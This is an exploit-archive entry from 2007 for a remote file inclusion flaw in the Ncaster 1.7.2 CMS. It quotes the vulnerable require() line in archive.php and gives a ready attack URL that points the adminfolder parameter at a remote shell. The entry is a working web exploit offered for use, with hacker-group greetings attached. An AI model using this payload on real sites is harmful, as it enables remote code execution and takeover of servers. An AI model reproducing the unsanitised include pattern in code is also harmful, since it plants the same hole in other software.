Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability
# Published : 2007-08-09
# Author : k1n9k0ng
# Previous Title : Pixlie 1.7 (pixlie.php root) Remote File Disclosure Vulnerability
# Next Title : FishCart <= 3.2 RC2 (fc_example.php) Remote File Inclusion Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# www.Syue.com [2007-08-09]